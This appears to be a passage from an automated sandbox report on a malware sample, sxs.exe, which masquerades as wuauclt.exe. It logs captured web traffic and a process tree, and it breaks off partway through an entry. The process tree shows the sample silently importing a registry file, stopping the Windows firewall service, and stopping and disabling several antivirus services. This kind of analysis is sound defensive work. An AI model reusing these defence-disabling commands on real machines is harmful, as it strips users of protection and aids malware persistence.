                                                                          Session ID: 38 | Source IP: 192.168.2.5 | Source Port: 53802 | Destination IP: 172.217.16.206 | Destination Port: 443 | PID: 4040 | Process: C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Timestamp: 2024-08-29 15:12:29 UTC | Bytes transferred: 883 | Direction: OUT | Data: GET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=2gf50ip8fgbm&aqid=1o_QZoOUFf6kjuwPko2JoA0&psid=7621175430&pbt=bv&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=11%7C0%7C1627%7C1343%7C1527&lle=0&ifv=1&hpt=0 HTTP/1.1
                                                                          Host: syndicatedsearch.goog
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Timestamp: 2024-08-29 15:12:29 UTC | Bytes transferred: 715 | Direction: IN | Data: HTTP/1.1 204 No Content
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-94hu7QdMziR0HhiT7lwwlg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                          Permissions-Policy: unload=()
                                                                          Date: Thu, 29 Aug 2024 15:12:29 GMT
                                                                          Server: gws
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID: 39 | Source IP: 192.168.2.5 | Source Port: 53799 | Destination IP: 52.165.165.26 | Destination Port: 443 | PID: | Process:
                                                                          Timestamp: 2024-08-29 15:12:29 UTC | Bytes transferred: 306 | Direction: OUT | Data: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lFzGF6yeVbArfYs&MD=x6PWfleO HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                          Host: slscr.update.microsoft.com
                                                                          Timestamp: 2024-08-29 15:12:29 UTC | Bytes transferred: 560 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/octet-stream
                                                                          Expires: -1
                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                          MS-CorrelationId: 96f2b0d4-2b77-4786-a3a1-b70bb3f5720d
                                                                          MS-RequestId: 8b9f3927-bad7-4aa5-976a-5e6f6b8d45f6
                                                                          MS-CV: /xFXqoNT1EyVkIkU.0
                                                                          X-Microsoft-SLSClientCache: 2880
                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Thu, 29 Aug 2024 15:12:28 GMT
                                                                          Connection: close
                                                                          Content-Length: 24490
                                                                          Timestamp: 2024-08-29 15:12:29 UTC | Bytes transferred: 15824 | Direction: IN | Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                          Timestamp: 2024-08-29 15:12:29 UTC | Bytes transferred: 8666 | Direction: IN | Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                          Session ID: 40 | Source IP: 192.168.2.5 | Source Port: 53808 | Destination IP: 23.1.237.91 | Destination Port: 443
                                                                          Timestamp: 2024-08-29 15:12:31 UTC | Bytes transferred: 2148 | Direction: OUT | Data: POST /threshold/xls.aspx HTTP/1.1
                                                                          Origin: https://www.bing.com
                                                                          Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                          Accept: */*
                                                                          Accept-Language: en-CH
                                                                          Content-type: text/xml
                                                                          X-Agent-DeviceId: 01000A410900D492
                                                                          X-BM-CBT: 1696428841
                                                                          X-BM-DateFormat: dd/MM/yyyy
                                                                          X-BM-DeviceDimensions: 784x984
                                                                          X-BM-DeviceDimensionsLogical: 784x984
                                                                          X-BM-DeviceScale: 100
                                                                          X-BM-DTZ: 120
                                                                          X-BM-Market: CH
                                                                          X-BM-Theme: 000000;0078d7
                                                                          X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                          X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22
                                                                          X-Device-isOptin: false
                                                                          X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                          X-Device-OSSKU: 48
                                                                          X-Device-Touch: false
                                                                          X-DeviceID: 01000A410900D492
                                                                          X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh
                                                                          X-MSEdge-ExternalExpType: JointCoord
                                                                          X-PositionerType: Desktop
                                                                          X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                          X-Search-CortanaAvailableCapabilities: None
                                                                          X-Search-SafeSearch: Moderate
                                                                          X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                          X-UserAgeClass: Unknown
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                          Host: www.bing.com
                                                                          Content-Length: 2484
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1724944316710&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
                                                                          Timestamp: 2024-08-29 15:12:31 UTC | Bytes transferred: 1 | Direction: OUT | Data Raw: 3c
                                                                          Data Ascii: <
                                                                          Timestamp: 2024-08-29 15:12:31 UTC | Bytes transferred: 2483 | Direction: OUT | Data Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                                          Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                                          Timestamp: 2024-08-29 15:12:32 UTC | Bytes transferred: 479 | Direction: IN | Data: HTTP/1.1 204 No Content
                                                                          Access-Control-Allow-Origin: *
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          X-MSEdge-Ref: Ref A: 1B6A91BEEE0A4FCFB242068DD55538DC Ref B: LAX311000108047 Ref C: 2024-08-29T15:12:32Z
                                                                          Date: Thu, 29 Aug 2024 15:12:32 GMT
                                                                          Connection: close
                                                                          Alt-Svc: h3=":443"; ma=93600
                                                                          X-CDN-TraceID: 0.5fed0117.1724944351.b9bf028


                                                                          Session ID: 41 | Source IP: 192.168.2.5 | Source Port: 53809 | Destination IP: 52.165.165.26 | Destination Port: 443 | PID: | Process:
                                                                          Timestamp: 2024-08-29 15:13:08 UTC | Bytes transferred: 306 | Direction: OUT | Data: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lFzGF6yeVbArfYs&MD=x6PWfleO HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                          Host: slscr.update.microsoft.com
                                                                          Timestamp: 2024-08-29 15:13:08 UTC | Bytes transferred: 560 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/octet-stream
                                                                          Expires: -1
                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                          MS-CorrelationId: fe928793-74e9-4837-a24f-feb1d8894c36
                                                                          MS-RequestId: 31fd3a79-9780-4d1c-9351-13e9e3578374
                                                                          MS-CV: EPqUwqprNECCPIVO.0
                                                                          X-Microsoft-SLSClientCache: 1440
                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Thu, 29 Aug 2024 15:13:08 GMT
                                                                          Connection: close
                                                                          Content-Length: 30005
                                                                          Timestamp: 2024-08-29 15:13:08 UTC | Bytes transferred: 15824 | Direction: IN | Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                          Timestamp: 2024-08-29 15:13:08 UTC | Bytes transferred: 14181 | Direction: IN | Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                          Target ID:0
                                                                          Start time:11:12:08
                                                                          Start date:29/08/2024
                                                                          Path:C:\Users\user\Desktop\sxs.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\sxs.exe"
                                                                          Imagebase:0x400000
                                                                          File size:55'448 bytes
                                                                          MD5 hash:4F89E3A88853265154E24969581FB45A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:11:12:09
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Internet Explorer\iexplore.exe
                                                                          Wow64 process (32bit):
                                                                          Commandline:"C:\Program Files\Internet Explorer\iexplore.exe"
                                                                          Imagebase:
                                                                          File size:834'512 bytes
                                                                          MD5 hash:CFE2E6942AC1B72981B3105E22D3224E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Target ID:3
                                                                          Start time:11:12:11
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\explorer.exe" http://www.onefordvd.com
                                                                          Imagebase:0x90000
                                                                          File size:4'514'184 bytes
                                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:11:12:11
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\wuauclt.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\wuauclt.exe"
                                                                          Imagebase:0x400000
                                                                          File size:55'448 bytes
                                                                          MD5 hash:4F89E3A88853265154E24969581FB45A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 91%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:5
                                                                          Start time:11:12:11
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                          Imagebase:0x7ff674740000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:11:12:12
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:8
                                                                          Start time:11:12:12
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2068,i,10012621105845313477,5144001626182359971,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:9
                                                                          Start time:11:12:14
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\explorer.exe" http://www.onefordvd.com
                                                                          Imagebase:0x90000
                                                                          File size:4'514'184 bytes
                                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:10
                                                                          Start time:11:12:14
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\regedit.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\regedit.exe" /s C:\Windows\noruns.reg
                                                                          Imagebase:0x3c0000
                                                                          File size:329'728 bytes
                                                                          MD5 hash:BD63D72DB4FA96A1E0250B1D36B7A827
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\net.exe" stop sharedaccess
                                                                          Imagebase:0x700000
                                                                          File size:47'104 bytes
                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:12
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                          Imagebase:0x7ff674740000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:13
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\net.exe" stop KVWSC
                                                                          Imagebase:0x700000
                                                                          File size:47'104 bytes
                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:14
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:15
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:16
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\sc.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\sc.exe" config KVWSC start= disabled
                                                                          Imagebase:0x710000
                                                                          File size:61'440 bytes
                                                                          MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:17
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\net.exe" stop KVSrvXP
                                                                          Imagebase:0x700000
                                                                          File size:47'104 bytes
                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:18
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:19
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\sc.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\sc.exe" config KVSrvXP start= disabled
                                                                          Imagebase:0x710000
                                                                          File size:61'440 bytes
                                                                          MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:20
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:21
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:22
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\net.exe" stop kavsvc
                                                                          Imagebase:0x700000
                                                                          File size:47'104 bytes
                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:23
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\sc.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\sc.exe" config kavsvc start= disabled
                                                                          Imagebase:0x710000
                                                                          File size:61'440 bytes
                                                                          MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:24
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
